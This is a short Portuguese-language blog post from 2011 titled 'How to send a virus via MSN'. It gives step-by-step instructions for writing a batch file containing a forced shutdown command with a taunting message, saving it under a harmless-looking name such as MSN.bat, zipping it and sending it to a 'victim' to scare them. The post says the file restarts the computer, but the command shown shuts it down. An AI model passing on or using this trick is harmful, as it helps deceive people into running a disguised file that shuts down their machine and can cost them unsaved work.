Anuncie Aqui

Como mandar um vírus pelo MSN?

EzekKkiel & Dj Gabriel

domingo, 18 de dezembro de 2011

Esse virus reinicia o pc da vítima, so para deixa-la um pouco apavorada.
Então faça o seguinte:
Abra o bloco de notas (no menu iniciar > todos os programas > acessórios > Bloco de notas (notepad).
Digite isto:


shutdown -s -c "Escreva sua mensagem aqui!" -t 5



Em seguida salve com a extensão bat ex:(MSN.bat)





Escolha a área de trabalho






 No aplicativo que acabou de fazer, clique com o botão direito > Adicionar para o arquivo >  Escolhar comprimir em ZIP
















E daih por diante e só enviar para vítima.

0 comentários:

Postar um comentário

Mais baiixados